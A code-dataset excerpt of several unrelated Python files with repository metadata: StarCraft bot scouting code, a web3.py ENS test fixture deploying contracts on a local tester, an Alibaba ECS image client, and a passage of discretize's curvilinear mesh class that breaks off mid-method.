'''Gives a scouting order to the given scout unit.'''
if self.proxy_scout_idx == len(self.expansion_locations) - 1:
self.proxy_scout_idx = 0
pos = self.expansion_locations[self.proxy_scout_idx]
self.proxy_scout_idx += 1
self.action_service.add(scout.tag, scout.move(pos), 10)
def reassign_proxy_scouts(self) -> None:
'''Reassigns proxy scouts that have completed their mission. Deletes proxy scouts who have died.'''
#remove dead scouts from self.proxy_scouts
#TODO only do this when unit dies (on_unit_destroyed), however need to be careful about making this hookable because on_step is explicitly called
self.proxy_scouts = self.proxy_scouts.tags_in({scout.tag for scout in self.proxy_scouts if scout in self.state.own_units})
#assign scouts that are done to a new task
scouts_that_are_done: set = {scout for scout in self.proxy_scouts if scout.is_idle}
for scout in scouts_that_are_done:
self.give_scouting_order(scout)
def is_scout(self, u: Unit) -> bool:
'''Determines whether or not the given unit should be considered a scouting unit.'''
return is_combat_unit(u) and u.type_id not in {UnitTypeId.DRONE, UnitTypeId.QUEEN} and not u in self.proxy_scouts
| 51.535484 | 250 | 0.668315 |
7a3d2044ddefd34afd795b0677e11a5e03eaca2a
| 13,963 |
py
|
Python
|
tests/ens/conftest.py
|
nathonNot/web3.py
|
5cf1fb7b84b590baa9b98a79d04e67b1554349a5
|
[
"MIT"
] | null | null | null |
tests/ens/conftest.py
|
nathonNot/web3.py
|
5cf1fb7b84b590baa9b98a79d04e67b1554349a5
|
[
"MIT"
] | null | null | null |
tests/ens/conftest.py
|
nathonNot/web3.py
|
5cf1fb7b84b590baa9b98a79d04e67b1554349a5
|
[
"MIT"
] | null | null | null |
import json
import pytest
from eth_tester import (
EthereumTester,
)
from ens import ENS
from ens.contract_data import (
registrar_abi,
registrar_bytecode,
registrar_bytecode_runtime,
resolver_abi,
resolver_bytecode,
resolver_bytecode_runtime,
reverse_registrar_abi,
reverse_registrar_bytecode,
reverse_registrar_bytecode_runtime,
reverse_resolver_abi,
reverse_resolver_bytecode,
reverse_resolver_bytecode_runtime,
)
from web3 import Web3
from web3.contract import (
Contract,
)
from web3.providers.eth_tester import (
EthereumTesterProvider,
)
def bytes32(val):
if isinstance(val, int):
result = Web3.toBytes(val)
else:
raise TypeError('val %r could not be converted to bytes')
if len(result) < 32:
return result.rjust(32, b'\0')
else:
return result
def deploy(w3, Factory, from_address, args=None):
args = args or []
factory = Factory(w3)
deploy_txn = factory.constructor(*args).transact({'from': from_address})
deploy_receipt = w3.eth.wait_for_transaction_receipt(deploy_txn)
assert deploy_receipt is not None
return factory(address=deploy_receipt['contractAddress'])
def DefaultReverseResolver(w3):
return w3.eth.contract(
bytecode=reverse_resolver_bytecode,
bytecode_runtime=reverse_resolver_bytecode_runtime,
abi=reverse_resolver_abi,
ContractFactoryClass=Contract,
)
def ReverseRegistrar(w3):
return w3.eth.contract(
bytecode=reverse_registrar_bytecode,
bytecode_runtime=reverse_registrar_bytecode_runtime,
abi=reverse_registrar_abi,
ContractFactoryClass=Contract,
)
def PublicResolverFactory(w3):
return w3.eth.contract(
bytecode=resolver_bytecode,
bytecode_runtime=resolver_bytecode_runtime,
abi=resolver_abi,
ContractFactoryClass=Contract,
)
def ENSFactory(w3):
return w3.eth.contract(
bytecode="6060604052341561000f57600080fd5b60008080526020527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb58054600160a060020a033316600160a060020a0319909116179055610501806100626000396000f300606060405236156100805763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630178b8bf811461008557806302571be3146100b757806306ab5923146100cd57806314ab9038146100f457806316a25cbd146101175780631896f70a1461014a5780635b0fc9c31461016c575b600080fd5b341561009057600080fd5b61009b60043561018e565b604051600160a060020a03909116815260200160405180910390f35b34156100c257600080fd5b61009b6004356101ac565b34156100d857600080fd5b6100f2600435602435600160a060020a03604435166101c7565b005b34156100ff57600080fd5b6100f260043567ffffffffffffffff60243516610289565b341561012257600080fd5b61012d600435610355565b60405167ffffffffffffffff909116815260200160405180910390f35b341561015557600080fd5b6100f2600435600160a060020a036024351661038c565b341561017757600080fd5b6100f2600435600160a060020a0360243516610432565b600090815260208190526040902060010154600160a060020a031690565b600090815260208190526040902054600160a060020a031690565b600083815260208190526040812054849033600160a060020a039081169116146101f057600080fd5b8484604051918252602082015260409081019051908190039020915083857fce0457fe73731f824cc272376169235128c118b49d344817417c6d108d155e8285604051600160a060020a03909116815260200160405180910390a3506000908152602081905260409020805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03929092169190911790555050565b600082815260208190526040902054829033600160a060020a039081169116146102b257600080fd5b827f1d4f9bbfc9cab89d66e1a1562f2233ccbf1308cb4f63de2ead5787adddb8fa688360405167ffffffffffffffff909116815260200160405180910390a250600091825260208290526040909120600101805467ffffffffffffffff90921674010000000000000000000000000000000000000000027fffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffff909216919091179055565b60009081526020819052604090206001015474010000000000000000000000000000000000000000900467ffffffffffffffff1690565b600082815260208190526040902054829033600160a060020a039081169116146103b557600080fd5b827f335721b01866dc23fbee8b6b2c7b1e14d6f05c28cd35a2c934239f94095602a083604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120600101805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03909216919091179055565b600082815260208190526040902054829033600160a060020a0390811691161461045b57600080fd5b827fd4735d920b0f87494915f556dd9b54c8f309026070caea5c737245152564d26683604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a039092169190911790555600a165627a7a7230582050975b6c54a16d216b563f4c4960d6ebc5881eb1ec73c2ef1f87920a251159530029", # noqa: E501
bytecode_runtime="606060405236156100805763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630178b8bf811461008557806302571be3146100b757806306ab5923146100cd57806314ab9038146100f457806316a25cbd146101175780631896f70a1461014a5780635b0fc9c31461016c575b600080fd5b341561009057600080fd5b61009b60043561018e565b604051600160a060020a03909116815260200160405180910390f35b34156100c257600080fd5b61009b6004356101ac565b34156100d857600080fd5b6100f2600435602435600160a060020a03604435166101c7565b005b34156100ff57600080fd5b6100f260043567ffffffffffffffff60243516610289565b341561012257600080fd5b61012d600435610355565b60405167ffffffffffffffff909116815260200160405180910390f35b341561015557600080fd5b6100f2600435600160a060020a036024351661038c565b341561017757600080fd5b6100f2600435600160a060020a0360243516610432565b600090815260208190526040902060010154600160a060020a031690565b600090815260208190526040902054600160a060020a031690565b600083815260208190526040812054849033600160a060020a039081169116146101f057600080fd5b8484604051918252602082015260409081019051908190039020915083857fce0457fe73731f824cc272376169235128c118b49d344817417c6d108d155e8285604051600160a060020a03909116815260200160405180910390a3506000908152602081905260409020805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03929092169190911790555050565b600082815260208190526040902054829033600160a060020a039081169116146102b257600080fd5b827f1d4f9bbfc9cab89d66e1a1562f2233ccbf1308cb4f63de2ead5787adddb8fa688360405167ffffffffffffffff909116815260200160405180910390a250600091825260208290526040909120600101805467ffffffffffffffff90921674010000000000000000000000000000000000000000027fffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffff909216919091179055565b60009081526020819052604090206001015474010000000000000000000000000000000000000000900467ffffffffffffffff1690565b600082815260208190526040902054829033600160a060020a039081169116146103b557600080fd5b827f335721b01866dc23fbee8b6b2c7b1e14d6f05c28cd35a2c934239f94095602a083604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120600101805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03909216919091179055565b600082815260208190526040902054829033600160a060020a0390811691161461045b57600080fd5b827fd4735d920b0f87494915f556dd9b54c8f309026070caea5c737245152564d26683604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a039092169190911790555600a165627a7a7230582050975b6c54a16d216b563f4c4960d6ebc5881eb1ec73c2ef1f87920a251159530029", # noqa: E501
abi=json.loads('[{"constant":true,"inputs":[{"name":"node","type":"bytes32"}],"name":"resolver","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"node","type":"bytes32"}],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"label","type":"bytes32"},{"name":"owner","type":"address"}],"name":"setSubnodeOwner","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"ttl","type":"uint64"}],"name":"setTTL","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"node","type":"bytes32"}],"name":"ttl","outputs":[{"name":"","type":"uint64"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"resolver","type":"address"}],"name":"setResolver","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"owner","type":"address"}],"name":"setOwner","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":true,"name":"label","type":"bytes32"},{"indexed":false,"name":"owner","type":"address"}],"name":"NewOwner","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":false,"name":"owner","type":"address"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":false,"name":"resolver","type":"address"}],"name":"NewResolver","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":false,"name":"ttl","type":"uint64"}],"name":"NewTTL","type":"event"}]'), # noqa: E501
ContractFactoryClass=Contract,
)
def ETHRegistrarFactory(w3):
return w3.eth.contract(
bytecode=registrar_bytecode,
bytecode_runtime=registrar_bytecode_runtime,
abi=registrar_abi,
ContractFactoryClass=Contract,
)
# session scope for performance
@pytest.fixture(scope="session")
def ens_setup():
w3 = Web3(EthereumTesterProvider(EthereumTester()))
# ** Set up ENS contracts **
# remove account that creates ENS, so test transactions don't have write access
accounts = w3.eth.accounts
ens_key = accounts.pop()
# create ENS contract
eth_labelhash = w3.keccak(text='eth')
eth_namehash = bytes32(0x93cdeb708b7545dc668eb9280176169d1c33cfd8ed6f04690a0bcc88a93fc4ae)
resolver_namehash = bytes32(0xfdd5d5de6dd63db72bbc2d487944ba13bf775b50a80805fe6fcaba9b0fba88f5)
reverse_tld_namehash = bytes32(0xa097f6721ce401e757d1223a763fef49b8b5f90bb18567ddb86fd205dff71d34) # noqa: E501
reverser_namehash = bytes32(0x91d1777781884d03a6757a803996e38de2a42967fb37eeaca72729271025a9e2)
ens_contract = deploy(w3, ENSFactory, ens_key)
# create public resolver
public_resolver = deploy(w3, PublicResolverFactory, ens_key, args=[ens_contract.address])
# set 'resolver.eth' to resolve to public resolver
ens_contract.functions.setSubnodeOwner(
b'\0' * 32,
eth_labelhash,
ens_key
).transact({'from': ens_key})
ens_contract.functions.setSubnodeOwner(
eth_namehash,
w3.keccak(text='resolver'),
ens_key
).transact({'from': ens_key})
ens_contract.functions.setResolver(
resolver_namehash,
public_resolver.address
).transact({'from': ens_key})
public_resolver.functions.setAddr(
resolver_namehash,
public_resolver.address
).transact({'from': ens_key})
# create .eth auction registrar
eth_registrar = deploy(
w3,
ETHRegistrarFactory,
ens_key,
args=[ens_contract.address, eth_namehash, 1],
)
# set '.eth' to resolve to the registrar
ens_contract.functions.setResolver(
eth_namehash,
public_resolver.address
).transact({'from': ens_key})
public_resolver.functions.setAddr(
eth_namehash,
eth_registrar.address
).transact({'from': ens_key})
# create reverse resolver
reverse_resolver = deploy(w3, DefaultReverseResolver, ens_key, args=[ens_contract.address])
# create reverse registrar
reverse_registrar = deploy(
w3,
ReverseRegistrar,
ens_key,
args=[ens_contract.address, reverse_resolver.address]
)
# set 'addr.reverse' to resolve to reverse registrar
ens_contract.functions.setSubnodeOwner(
b'\0' * 32,
w3.keccak(text='reverse'),
ens_key
).transact({'from': ens_key})
ens_contract.functions.setSubnodeOwner(
reverse_tld_namehash,
w3.keccak(text='addr'),
ens_key
).transact({'from': ens_key})
ens_contract.functions.setResolver(
reverser_namehash,
public_resolver.address
).transact({'from': ens_key})
public_resolver.functions.setAddr(
reverser_namehash,
reverse_registrar.address
).transact({'from': ens_key})
# set owner of tester.eth to an account controlled by tests
ens_contract.functions.setSubnodeOwner(
eth_namehash,
w3.keccak(text='tester'),
w3.eth.accounts[2] # note that this does not have to be the default, only in the list
).transact({'from': ens_key})
# make the registrar the owner of the 'eth' name
ens_contract.functions.setSubnodeOwner(
b'\0' * 32,
eth_labelhash,
eth_registrar.address
).transact({'from': ens_key})
# make the reverse registrar the owner of the 'addr.reverse' name
ens_contract.functions.setSubnodeOwner(
reverse_tld_namehash,
w3.keccak(text='addr'),
reverse_registrar.address
).transact({'from': ens_key})
return ENS.fromWeb3(w3, ens_contract.address)
@pytest.fixture
def ens(ens_setup, mocker):
mocker.patch('web3.middleware.stalecheck._isfresh', return_value=True)
ens_setup.w3.eth.default_account = ens_setup.w3.eth.coinbase
return ens_setup
@pytest.fixture()
def TEST_ADDRESS(address_conversion_func):
return address_conversion_func("0x000000000000000000000000000000000000dEaD")
| 60.708696 | 2,792 | 0.80477 |
fb674597ad56189ac37eef75a7188f2742d97a7a
| 7,425 |
py
|
Python
|
src/lib/python/image/alibaba_client.py
|
memes/f5-bigip-image-generator
|
9684d185db3990fc966554c0611fe6369174303b
|
[
"Apache-2.0"
] | 34 |
2019-08-21T01:28:27.000Z
|
2021-10-05T07:21:58.000Z
|
src/lib/python/image/alibaba_client.py
|
memes/f5-bigip-image-generator
|
9684d185db3990fc966554c0611fe6369174303b
|
[
"Apache-2.0"
] | 34 |
2019-09-13T10:17:31.000Z
|
2022-03-09T00:01:00.000Z
|
src/lib/python/image/alibaba_client.py
|
memes/f5-bigip-image-generator
|
9684d185db3990fc966554c0611fe6369174303b
|
[
"Apache-2.0"
] | 16 |
2019-08-21T20:06:17.000Z
|
2022-03-25T11:59:00.000Z
|
"""Alibaba client module"""
# Copyright (C) 2019-2021 F5 Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import json
import aliyunsdkcore.request
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException, ServerException
from aliyunsdkecs.request.v20140526.AddTagsRequest \
import AddTagsRequest
from aliyunsdkecs.request.v20140526.DeleteImageRequest \
import DeleteImageRequest
from aliyunsdkecs.request.v20140526.DescribeImagesRequest \
import DescribeImagesRequest
from aliyunsdkecs.request.v20140526.ImportImageRequest \
import ImportImageRequest
from aliyunsdkecs.request.v20140526.CancelTaskRequest \
import CancelTaskRequest
from aliyunsdkecs.request.v20140526.DescribeTaskAttributeRequest \
import DescribeTaskAttributeRequest
from aliyunsdkecs.request.v20140526.DescribeImageSharePermissionRequest \
import DescribeImageSharePermissionRequest
from aliyunsdkecs.request.v20140526.ModifyImageSharePermissionRequest \
import ModifyImageSharePermissionRequest
from util.config import get_config_value
from util.logger import LOGGER
class AlibabaClient():
""" Class for sending requests to Alibaba cloud services """
@staticmethod
def __get_acs_client():
""" Setup and return a client to Alibaba cloud service.
Requires ALIBABA_ACCESS_KEY_ID and ALIBABA_ACCESS_KEY_SECRET to be set. """
client = AcsClient(get_config_value('ALIBABA_ACCESS_KEY_ID'),
get_config_value('ALIBABA_ACCESS_KEY_SECRET'),
get_config_value('ALIBABA_REGION'))
return client
def __send_request(self, request):
""" Send a request to Alibaba cloud services """
aliyunsdkcore.request.set_default_protocol_type('https')
request.set_protocol_type('https')
request.set_accept_format('json')
client = self.__get_acs_client()
try:
response_str = client.do_action_with_exception(request)
except ClientException as exc:
LOGGER.exception(exc)
raise RuntimeError('Check correctness of ALIBABA_REGION configuration variable') \
from exc
except ServerException as exc:
LOGGER.exception(exc)
if exc.get_error_code() == 'InvalidAccessKeyId.NotFound' and \
exc.get_error_msg() == 'Specified access key is not found.':
raise RuntimeError('InvalidAccessKeyId.NotFound: Check correctness of ' +
'ALIBABA_ACCESS_KEY_ID configuration variable') from exc
if exc.get_error_code() == 'IncompleteSignature' and \
exc.get_error_msg().startswith('The request signature does not conform to ' +
'Aliyun standards'):
raise RuntimeError('IncompleteSignature: Check correctness of ' +
'ALIBABA_ACCESS_KEY_SECRET configuration variable') from exc
if exc.get_error_code() == 'InvalidAccessKeySecret' and \
exc.get_error_msg() == 'The AccessKeySecret is incorrect. Please check ' + \
'your AccessKeyId and AccessKeySecret.':
raise RuntimeError('InvalidAccessKeySecret: Check correctness of ' +
'ALIBABA_ACCESS_KEY_ID and ALIBABA_ACCESS_KEY_SECRET ' +
'configuration variables') from exc
raise exc
response = json.loads(response_str)
if 'Code' in response.keys():
LOGGER.warning('Request to Alibaba has \'Code\' attribute. Full Alibaba response:')
LOGGER.warning(json.dumps(response, sort_keys=True, indent=4, separators=(',', ': ')))
return response
def add_tags(self, resource_id, resource_type, tags):
""" Add Resource Tags by resource id.
Return Alibaba response """
# Transform tags dictionary to array of dictionaries
tags_array = []
for key, value in tags.items():
array_entry = {"Key":key, "Value":value}
tags_array.append(array_entry)
request = AddTagsRequest()
request.set_ResourceId(resource_id)
request.set_ResourceType(resource_type)
request.set_Tags(tags_array)
return self.__send_request(request)
def delete_image(self, image_id):
""" Delete image by image id
Return Alibaba response """
request = DeleteImageRequest()
request.set_ImageId(image_id)
return self.__send_request(request)
def describe_images(self, image_id, image_name):
""" Send request to get details of images
Filter by image id and name
Return Alibaba response """
request = DescribeImagesRequest()
if image_id:
request.set_ImageId(image_id)
if image_name:
request.set_ImageName(image_name)
return self.__send_request(request)
def import_image(self, oss_bucket, oss_object, image_name):
""" Form and send request to to import image
Return Alibaba response """
oss_image = [{'OSSBucket': oss_bucket, 'OSSObject': oss_object}]
request = ImportImageRequest()
request.set_DiskDeviceMappings(oss_image)
request.set_OSType('Linux')
request.set_Architecture('x86_64')
request.set_Platform('Others Linux')
request.set_ImageName(image_name)
request.set_Description(image_name)
return self.__send_request(request)
def cancel_task(self, task_id):
""" Send request to cancel task by task id
Return Alibaba response """
request = CancelTaskRequest()
request.set_TaskId(task_id)
return self.__send_request(request)
def describe_task_attribute(self, task_id):
""" Send request to get task state with matching id
Return Alibaba response """
request = DescribeTaskAttributeRequest()
request.set_TaskId(task_id)
return self.__send_request(request)
def share_image_with_accounts(self, image_id, share_account_ids):
""" Send request to share image with other alibaba
accounts. Return Alibaba response """
request = ModifyImageSharePermissionRequest()
request.set_ImageId(image_id)
request.set_AddAccounts(share_account_ids)
return self.__send_request(request)
def describe_image_share_permission(self, image_id):
"""Print description of an image's share permissions"""
if image_id is None or not image_id:
raise Exception('No image id provided')
request = DescribeImageSharePermissionRequest()
if image_id:
request.set_ImageId(image_id)
return self.__send_request(request)
| 43.676471 | 98 | 0.673535 |
7a935222c69ac2494c1d534c23a37a47c35ae88d
| 15,969 |
py
|
Python
|
discretize/curvilinear_mesh.py
|
ckohnke/discretize
|
f414dd7ee7c5ba9a141cb2c37d4b71fdc531eae8
|
[
"MIT"
] | null | null | null |
discretize/curvilinear_mesh.py
|
ckohnke/discretize
|
f414dd7ee7c5ba9a141cb2c37d4b71fdc531eae8
|
[
"MIT"
] | null | null | null |
discretize/curvilinear_mesh.py
|
ckohnke/discretize
|
f414dd7ee7c5ba9a141cb2c37d4b71fdc531eae8
|
[
"MIT"
] | null | null | null |
import numpy as np
import properties
from discretize.utils import mkvc, index_cube, face_info, volume_tetrahedron
from discretize.base import BaseRectangularMesh
from discretize.operators import DiffOperators, InnerProducts
from discretize.utils.code_utils import deprecate_property
# Some helper functions.
def _length2D(x):
return (x[:, 0] ** 2 + x[:, 1] ** 2) ** 0.5
def _length3D(x):
return (x[:, 0] ** 2 + x[:, 1] ** 2 + x[:, 2] ** 2) ** 0.5
def _normalize2D(x):
return x / np.kron(np.ones((1, 2)), mkvc(_length2D(x), 2))
def _normalize3D(x):
return x / np.kron(np.ones((1, 3)), mkvc(_length3D(x), 2))
class CurvilinearMesh(BaseRectangularMesh, DiffOperators, InnerProducts):
"""CurvilinearMesh is a mesh class that deals with curvilinear meshes.
Example of a curvilinear mesh:
.. plot::
:include-source:
import discretize
X, Y = discretize.utils.exampleLrmGrid([3,3],'rotate')
mesh = discretize.CurvilinearMesh([X, Y])
mesh.plot_grid(show_it=True)
"""
_meshType = "Curv"
_aliases = {
**DiffOperators._aliases,
**BaseRectangularMesh._aliases,
**{
"gridCC": "cell_centers",
"gridN": "nodes",
"gridFx": "faces_x",
"gridFy": "faces_y",
"gridFz": "faces_z",
"gridEx": "edges_x",
"gridEy": "edges_y",
"gridEz": "edges_z",
},
}
node_list = properties.List(
"List of arrays describing the node locations",
prop=properties.Array(
"node locations in an n-dimensional array",
shape={("*", "*"), ("*", "*", "*")},
),
min_length=2,
max_length=3,
)
def __init__(self, node_list=None, **kwargs):
if 'nodes' in kwargs:
node_list = kwargs.pop('nodes')
self.node_list = node_list
if "_n" in kwargs.keys():
n = kwargs.pop("_n")
if np.any(n != np.array(self.node_list[0].shape) - 1):
raise ValueError(
"Unexpected n-values. {} was provided, {} was expected".format(
n, np.array(self.node_list[0].shape) - 1
)
)
else:
n = np.array(self.node_list[0].shape) - 1
BaseRectangularMesh.__init__(self, n, **kwargs)
# Save nodes to private variable _nodes as vectors
self._nodes = np.ones((self.node_list[0].size, self.dim))
for i, node_i in enumerate(self.node_list):
self._nodes[:, i] = mkvc(node_i.astype(float))
self.origin = self.nodes.min(axis=0)
@properties.validator("node_list")
def _check_nodes(self, change):
if len(change["value"]) <= 1:
raise ValueError("len(node) must be greater than 1")
for i, change["value"][i] in enumerate(change["value"]):
if change["value"][i].shape != change["value"][0].shape:
raise ValueError(
"change['value'][{0:d}] is not the same shape as "
"change['value'][0]".format(i)
)
if len(change["value"][0].shape) != len(change["value"]):
raise ValueError("Dimension mismatch")
@classmethod
def deserialize(cls, value, **kwargs):
if "nodes" in value:
value["node_list"] = value.pop("nodes")
return super().deserialize(value, **kwargs)
@property
def cell_centers(self):
"""
Cell-centered grid
"""
if getattr(self, "_cell_centers", None) is None:
self._cell_centers = np.concatenate(
[self.aveN2CC * self.gridN[:, i] for i in range(self.dim)]
).reshape((-1, self.dim), order="F")
return self._cell_centers
@property
def nodes(self):
"""
Nodal grid.
"""
if getattr(self, "_nodes", None) is None:
raise Exception("Someone deleted this. I blame you.")
return self._nodes
@property
def faces_x(self):
"""
Face staggered grid in the x direction.
"""
if getattr(self, "_faces_x", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:, :-1] + n[:, 1:])) for n in N]
self._faces_x = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [
mkvc(
0.25
* (
n[:, :-1, :-1]
+ n[:, :-1, 1:]
+ n[:, 1:, :-1]
+ n[:, 1:, 1:]
)
)
for n in N
]
self._faces_x = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._faces_x
@property
def faces_y(self):
"""
Face staggered grid in the y direction.
"""
if getattr(self, "_faces_y", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:-1, :] + n[1:, :])) for n in N]
self._faces_y = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [
mkvc(
0.25
* (
n[:-1, :, :-1]
+ n[:-1, :, 1:]
+ n[1:, :, :-1]
+ n[1:, :, 1:]
)
)
for n in N
]
self._faces_y = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._faces_y
@property
def faces_z(self):
"""
Face staggered grid in the y direction.
"""
if getattr(self, "_faces_z", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
XYZ = [
mkvc(
0.25
* (n[:-1, :-1, :] + n[:-1, 1:, :] + n[1:, :-1, :] + n[1:, 1:, :])
)
for n in N
]
self._faces_z = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._faces_z
@property
def edges_x(self):
"""
Edge staggered grid in the x direction.
"""
if getattr(self, "_edges_x", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:-1, :] + n[1:, :])) for n in N]
self._edges_x = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [mkvc(0.5 * (n[:-1, :, :] + n[1:, :, :])) for n in N]
self._edges_x = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._edges_x
@property
def edges_y(self):
"""
Edge staggered grid in the y direction.
"""
if getattr(self, "_edges_y", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:, :-1] + n[:, 1:])) for n in N]
self._edges_y = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [mkvc(0.5 * (n[:, :-1, :] + n[:, 1:, :])) for n in N]
self._edges_y = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._edges_y
@property
def edges_z(self):
"""
Edge staggered grid in the z direction.
"""
if getattr(self, "_edges_z", None) is None and self.dim == 3:
N = self.reshape(self.gridN, "N", "N", "M")
XYZ = [mkvc(0.5 * (n[:, :, :-1] + n[:, :, 1:])) for n in N]
self._edges_z = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._edges_z
# --------------- Geometries ---------------------
#
#
# ------------------- 2D -------------------------
#
# node(i,j) node(i,j+1)
# A -------------- B
# | |
# | cell(i,j) |
# | I |
# | |
# D -------------- C
# node(i+1,j) node(i+1,j+1)
#
# ------------------- 3D -------------------------
#
#
# node(i,j,k+1) node(i,j+1,k+1)
# E --------------- F
# /| / |
# / | / |
# / | / |
# node(i,j,k) node(i,j+1,k)
# A -------------- B |
# | H ----------|---- G
# | /cell(i,j) | /
# | / I | /
# | / | /
# D -------------- C
# node(i+1,j,k) node(i+1,j+1,k)
@property
def cell_volumes(self):
"""
Construct cell volumes of the 3D model as 1d array
"""
if getattr(self, "_cell_volumes", None) is None:
if self.dim == 2:
A, B, C, D = index_cube("ABCD", self.vnN)
normal, area = face_info(
np.c_[self.gridN, np.zeros((self.nN, 1))], A, B, C, D
)
self._cell_volumes = area
elif self.dim == 3:
# Each polyhedron can be decomposed into 5 tetrahedrons
# However, this presents a choice so we may as well divide in
# two ways and average.
A, B, C, D, E, F, G, H = index_cube("ABCDEFGH", self.vnN)
vol1 = (
volume_tetrahedron(self.gridN, A, B, D, E)
+ volume_tetrahedron(self.gridN, B, E, F, G) # cutted edge top
+ volume_tetrahedron(self.gridN, B, D, E, G) # cutted edge top
+ volume_tetrahedron(self.gridN, B, C, D, G) # middle
+ volume_tetrahedron(self.gridN, D, E, G, H) # cutted edge bottom
) # cutted edge bottom
vol2 = (
volume_tetrahedron(self.gridN, A, F, B, C)
+ volume_tetrahedron(self.gridN, A, E, F, H) # cutted edge top
+ volume_tetrahedron(self.gridN, A, H, F, C) # cutted edge top
+ volume_tetrahedron(self.gridN, C, H, D, A) # middle
+ volume_tetrahedron(self.gridN, C, G, H, F) # cutted edge bottom
) # cutted edge bottom
self._cell_volumes = (vol1 + vol2) / 2
return self._cell_volumes
@property
def face_areas(self):
"""
Area of the faces
"""
if (
getattr(self, "_face_areas", None) is None
or getattr(self, "_normals", None) is None
):
# Compute areas of cell faces
if self.dim == 2:
xy = self.gridN
A, B = index_cube("AB", self.vnN, self.vnFx)
edge1 = xy[B, :] - xy[A, :]
normal1 = np.c_[edge1[:, 1], -edge1[:, 0]]
area1 = _length2D(edge1)
A, D = index_cube("AD", self.vnN, self.vnFy)
# Note that we are doing A-D to make sure the normal points the
# right way.
# Think about it. Look at the picture. Normal points towards C
# iff you do this.
edge2 = xy[A, :] - xy[D, :]
normal2 = np.c_[edge2[:, 1], -edge2[:, 0]]
area2 = _length2D(edge2)
self._face_areas = np.r_[mkvc(area1), mkvc(area2)]
self._normals = [_normalize2D(normal1), _normalize2D(normal2)]
elif self.dim == 3:
A, E, F, B = index_cube("AEFB", self.vnN, self.vnFx)
normal1, area1 = face_info(
self.gridN, A, E, F, B, average=False, normalizeNormals=False
)
A, D, H, E = index_cube("ADHE", self.vnN, self.vnFy)
normal2, area2 = face_info(
self.gridN, A, D, H, E, average=False, normalizeNormals=False
)
A, B, C, D = index_cube("ABCD", self.vnN, self.vnFz)
normal3, area3 = face_info(
self.gridN, A, B, C, D, average=False, normalizeNormals=False
)
self._face_areas = np.r_[mkvc(area1), mkvc(area2), mkvc(area3)]
self._normals = [normal1, normal2, normal3]
return self._face_areas
@property
def face_normals(self):
"""
Face normals: calling this will average
the computed normals so that there is one
per face. This is especially relevant in
3D, as there are up to 4 different normals
for each face that will be different.
To reshape the normals into a matrix and get the y component::
NyX, NyY, NyZ = M.reshape(M.face_normals, 'F', 'Fy', 'M')
"""
if getattr(self, "_normals", None) is None:
self.face_areas # calling .face_areas will create the face normals
if self.dim == 2:
return _normalize2D(np.r_[self._normals[0], self._normals[1]])
elif self.dim == 3:
normal1 = (
self._normals[0][0]
+ self._normals[0][1]
+ self._normals[0][2]
+ self._normals[0][3]
) / 4
normal2 = (
self._normals[1][0]
+ self._normals[1][1]
+ self._normals[1][2]
+ self._normals[1][3]
) / 4
normal3 = (
self._normals[2][0]
